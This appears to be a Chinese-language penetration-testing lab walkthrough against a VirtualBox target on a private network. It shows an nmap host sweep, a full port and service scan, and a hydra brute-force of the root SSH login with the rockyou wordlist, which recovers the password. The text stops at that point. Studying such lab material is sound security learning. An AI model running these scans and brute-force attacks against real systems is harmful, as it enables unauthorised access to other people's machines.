渗透学习

1.扫描网段

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(root㉿kali)-[/home/ace]
└─# nmap -sP 192.168.56.127/24     
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-11 09:58 CST
Nmap scan report for 192.168.56.1
Host is up (0.00027s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00042s latency).
MAC Address: 08:00:27:57:9D:81 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.142
Host is up (0.0014s latency).
MAC Address: 08:00:27:E5:B8:CE (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.127
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 28.00 seconds

2.扫描端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(root㉿kali)-[/home/ace]
└─# nmap -sC -sV -A -p- 192.168.56.142
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-11 10:10 CST
Nmap scan report for 192.168.56.142
Host is up (0.0010s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.3 (protocol 2.0)
| ssh-hostkey: 
|   3072 2c1b3627e54c527b3e10944139efb295 (RSA)
|   256 93c11e32240e34d9020effc39c599bdd (ECDSA)
|_  256 81ab36ecb12b5cd28655120c510027d7 (ED25519)
80/tcp open  http    nginx
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:E5:B8:CE (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   1.01 ms 192.168.56.142

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.21 seconds

3.ssh爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(root㉿kali)-[/home/ace]
└─# hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.142
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-11 10:17:12
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.142:22/
[STATUS] 146.00 tries/min, 146 tries in 00:01h, 14344256 to do in 1637:29h, 13 active
[22][ssh] host: 192.168.56.142   login: root   password: simple
[STATUS] 4781466.33 tries/min, 14344399 tries in 00:03h, 3 to do in 00:01h, 9 active
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 5 final worker threads did not complete until end.
[ERROR] 5 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-08-11 10:20:28